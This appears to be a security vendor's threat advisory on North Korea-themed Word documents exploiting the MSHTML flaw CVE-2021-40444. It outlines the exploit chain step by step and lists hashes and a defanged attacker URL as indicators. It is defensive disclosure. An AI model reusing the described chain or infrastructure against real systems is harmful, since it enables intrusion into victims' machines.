North Korea-related Malicious Document Files Using CVE-2021-40444 Vulnerability

The ASEC analysis team has recently discovered the distribution of malicious files that include a new vulnerability CVE-2021-40444 which was revealed by Microsoft in September. It is noteworthy that the confirmed document files are all North Korea-related materials. North Korea-related malicious files have been evolving in new ways since the past. Seeing that the attackers are using a new vulnerability, they are quickly applying the new techniques in their distribution.

CVE-2021-40444 is a vulnerability that allows remote code execution of MSHTML. MSHTML is a browser rendering engine of Internet Explorer and Office applications. This vulnerability works on Internet Explorer and Office document applications. Magniber ransomware has also been exploiting the vulnerability since September, and it is being distributed even now via Internet Explorer.

Office document files that include this vulnerability are being distributed with the following filenames, tricking users into thinking that they are North Korea-related materials.

● (2021-1118) Korea Institute for ******** Unification – Graduate School of *********** Joint Seminar Program (final).docx
● +Seminar on Promotion of Cross-border Corporation between Russia, China, and North Korea.docx

The external URL shown in the following figure was used to activate CVE-2021-40444, and the steps of attack are as follows:

  1. Approaches malicious URL via MHTML (MIME HTML) protocol
  2. Uses Office application’s in-built browser rendering engine to run Javascript that consists of malicious syntax
  3. Downloads CAB file, loads malicious DLL file with INF extension inside CAB file, and executes malicious behavior
Figure 1. External URL inside XML file of malicious document

Once the malicious behavior is executed, the text inside the file can be seen. It details an agenda of Unification Institution’s seminar that takes place on November 18.

Figure 2. Detailed text inside North Korea-related document

Given that the two North Korea-related document files access the same URL, we suspect that one attacker is the author of these files. The server is currently open, but the access is blocked.

Like this, malicious document files related to North Korea are continuously being distributed using various vulnerabilities. As the files actually contain North Korea-related materials, making it difficult for users to acknowledge that they are malicious files even after running them, we would advise users to take extra caution.

V3 products detect such files using the following aliases:

Figure 3. V3 detection

[File Detection]
Downloader/XML.Generic
Exploit/XML.Cve-2021-40444.S1697

[IOC Info]
1132d2a12b6fd6cbbc8046df3612d725
2edbab4834a1315b476278fb6ed2592f
809c4c40537c60e224363b94296fbbf2
hxxp://officeversion[.]mywebcommunity[.]org/ole/

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 2 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments